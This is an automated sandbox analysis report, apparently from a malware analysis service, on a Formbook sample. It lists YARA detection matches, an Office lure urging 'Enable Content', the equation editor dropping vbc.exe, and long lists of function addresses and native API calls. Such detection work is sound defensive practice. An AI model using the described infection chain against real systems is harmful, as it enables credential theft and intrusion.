Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Content from the yellow bar above 21 ^ 22 23 24 m. 25 m 26 27 m 28 29 ' 30 3
Source: Screenshot number: 8 Screenshot OCR: Enable Content from the yellow bar above 21 ^ 22 23 24 m. 25 m 26 27 m 28 29 ' 30 3
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Yara signature match
Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E18B0
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E03E4
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E1BC2
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E04A8
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E07C6
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E0812
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E1951
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E9A50
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E9CA9
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E9CB8
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E2CF8
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E0D11
Source: C:\Users\Public\vbc.exe Code function: 4_2_00901B10
Source: C:\Users\Public\vbc.exe Code function: 5_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C95A
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C96E
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041D128
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C38D
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041BB9E
Source: C:\Users\Public\vbc.exe Code function: 5_2_00408C90
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D8A
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041BF8B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 5_2_008EE0C6
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091D005
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090905A
Source: C:\Users\Public\vbc.exe Code function: 5_2_008F3040
Source: C:\Users\Public\vbc.exe Code function: 5_2_008EE2E9
Source: C:\Users\Public\vbc.exe Code function: 5_2_00991238
Source: C:\Users\Public\vbc.exe Code function: 5_2_008EF3CF
Source: C:\Users\Public\vbc.exe Code function: 5_2_009163DB
Source: C:\Users\Public\vbc.exe Code function: 5_2_008F2305
Source: C:\Users\Public\vbc.exe Code function: 5_2_008F7353
Source: C:\Users\Public\vbc.exe Code function: 5_2_0093A37B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00925485
Source: C:\Users\Public\vbc.exe Code function: 5_2_00901489
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090C5F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_008F351F
Source: C:\Users\Public\vbc.exe Code function: 5_2_008F4680
Source: C:\Users\Public\vbc.exe Code function: 5_2_008FE6C1
Source: C:\Users\Public\vbc.exe Code function: 5_2_00992622 5_2_00992622
Source: C:\Users\Public\vbc.exe Code function: 5_2_0097579A 5_2_0097579A
Source: C:\Users\Public\vbc.exe Code function: 5_2_008FC7BC 5_2_008FC7BC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098F8EE 5_2_0098F8EE
Source: C:\Users\Public\vbc.exe Code function: 5_2_008FC85C 5_2_008FC85C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091286D 5_2_0091286D
Source: C:\Users\Public\vbc.exe Code function: 5_2_0099098E 5_2_0099098E
Source: C:\Users\Public\vbc.exe Code function: 5_2_008F29B2 5_2_008F29B2
Source: C:\Users\Public\vbc.exe Code function: 5_2_009069FE 5_2_009069FE
Source: C:\Users\Public\vbc.exe Code function: 5_2_00975955 5_2_00975955
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_022A1238 7_2_022A1238
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021FE2E9 7_2_021FE2E9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02202305 7_2_02202305
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0224A37B 7_2_0224A37B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02207353 7_2_02207353
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_022A63BF 7_2_022A63BF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021FF3CF 7_2_021FF3CF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_022263DB 7_2_022263DB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0222D005 7_2_0222D005
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02203040 7_2_02203040
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0221905A 7_2_0221905A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021FE0C6 7_2_021FE0C6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_022A2622 7_2_022A2622
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0224A634 7_2_0224A634
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02204680 7_2_02204680
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0220E6C1 7_2_0220E6C1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0220C7BC 7_2_0220C7BC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0228579A 7_2_0228579A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_022357C3 7_2_022357C3
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0228443E 7_2_0228443E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0223D47D 7_2_0223D47D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02235485 7_2_02235485
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02211489 7_2_02211489
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0220351F 7_2_0220351F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02246540 7_2_02246540
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0221C5F0 7_2_0221C5F0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_022B3A83 7_2_022B3A83
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02227B00 7_2_02227B00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_022ACBA4 7_2_022ACBA4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021FFBD7 7_2_021FFBD7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0228DBDA 7_2_0228DBDA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0222286D 7_2_0222286D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0220C85C 7_2_0220C85C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0229F8EE 7_2_0229F8EE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0228394B 7_2_0228394B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02285955 7_2_02285955
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_022029B2 7_2_022029B2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_022A098E 7_2_022A098E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_022169FE 7_2_022169FE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02232E2F 7_2_02232E2F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0221EE4C 7_2_0221EE4C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02210F3F 7_2_02210F3F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0222DF7C 7_2_0222DF7C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0229CFB1 7_2_0229CFB1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02272FDC 7_2_02272FDC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02230D3B 7_2_02230D3B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0220CD5B 7_2_0220CD5B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0229FDDD 7_2_0229FDDD
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_000DD128 7_2_000DD128
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_000DC38D 7_2_000DC38D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_000DC95A 7_2_000DC95A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_000DC96E 7_2_000DC96E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_000DBB9E 7_2_000DBB9E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_000C8C90 7_2_000C8C90
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_000C2D8A 7_2_000C2D8A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_000C2D90 7_2_000C2D90
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_000C2FB0 7_2_000C2FB0
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 0095F970 appears 49 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0093373B appears 148 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00933F92 appears 66 times
Source: C:\Users\Public\vbc.exe Code function: String function: 008EDF5C appears 71 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 0226F970 appears 84 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 021FDF5C appears 119 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 021FE2A8 appears 38 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 0224373B appears 245 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 02243F92 appears 132 times
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 5_2_004185F0 NtCreateFile, 5_2_004185F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_004186A0 NtReadFile, 5_2_004186A0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00418720 NtClose, 5_2_00418720
Source: C:\Users\Public\vbc.exe Code function: 5_2_004187D0 NtAllocateVirtualMemory, 5_2_004187D0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00418642 NtCreateFile, 5_2_00418642
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041869D NtReadFile, 5_2_0041869D
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041871A NtClose, 5_2_0041871A
Source: C:\Users\Public\vbc.exe Code function: 5_2_004187CB NtAllocateVirtualMemory, 5_2_004187CB
Source: C:\Users\Public\vbc.exe Code function: 5_2_008E00C4 NtCreateFile,LdrInitializeThunk, 5_2_008E00C4
Source: C:\Users\Public\vbc.exe Code function: 5_2_008E0048 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_008E0048
Source: C:\Users\Public\vbc.exe Code function: 5_2_008E0078 NtResumeThread,LdrInitializeThunk, 5_2_008E0078
Source: C:\Users\Public\vbc.exe Code function: 5_2_008E07AC NtCreateMutant,LdrInitializeThunk, 5_2_008E07AC
Source: C:\Users\Public\vbc.exe Code function: 5_2_008DF9F0 NtClose,LdrInitializeThunk, 5_2_008DF9F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_008DF900 NtReadFile,LdrInitializeThunk, 5_2_008DF900
Source: C:\Users\Public\vbc.exe Code function: 5_2_008DFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_008DFAD0
Source: C:\Users\Public\vbc.exe Code function: 5_2_008DFAE8 NtQueryInformationProcess,LdrInitializeThunk, 5_2_008DFAE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_008DFBB8 NtQueryInformationToken,LdrInitializeThunk, 5_2_008DFBB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_008DFB68 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_008DFB68
Source: C:\Users\Public\vbc.exe Code function: 5_2_008DFC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_008DFC90
Source: C:\Users\Public\vbc.exe Code function: 5_2_008DFC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_008DFC60
Source: C:\Users\Public\vbc.exe Code function: 5_2_008DFD8C NtDelayExecution,LdrInitializeThunk, 5_2_008DFD8C
Source: C:\Users\Public\vbc.exe Code function: 5_2_008DFDC0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_008DFDC0
Source: C:\Users\Public\vbc.exe Code function: 5_2_008DFEA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_008DFEA0
Source: C:\Users\Public\vbc.exe Code function: 5_2_008DFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_008DFED0
Source: C:\Users\Public\vbc.exe Code function: 5_2_008DFFB4 NtCreateSection,LdrInitializeThunk, 5_2_008DFFB4
Source: C:\Users\Public\vbc.exe Code function: 5_2_008E10D0 NtOpenProcessToken, 5_2_008E10D0
Source: C:\Users\Public\vbc.exe Code function: 5_2_008E0060 NtQuerySection, 5_2_008E0060
Source: C:\Users\Public\vbc.exe Code function: 5_2_008E01D4 NtSetValueKey, 5_2_008E01D4
Source: C:\Users\Public\vbc.exe Code function: 5_2_008E010C NtOpenDirectoryObject, 5_2_008E010C
Source: C:\Users\Public\vbc.exe Code function: 5_2_008E1148 NtOpenThread, 5_2_008E1148
Source: C:\Users\Public\vbc.exe Code function: 5_2_008DF8CC NtWaitForSingleObject, 5_2_008DF8CC
Source: C:\Users\Public\vbc.exe Code function: 5_2_008DF938 NtWriteFile, 5_2_008DF938
Source: C:\Users\Public\vbc.exe Code function: 5_2_008E1930 NtSetContextThread, 5_2_008E1930
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_021F00C4 NtCreateFile,LdrInitializeThunk, 7_2_021F00C4
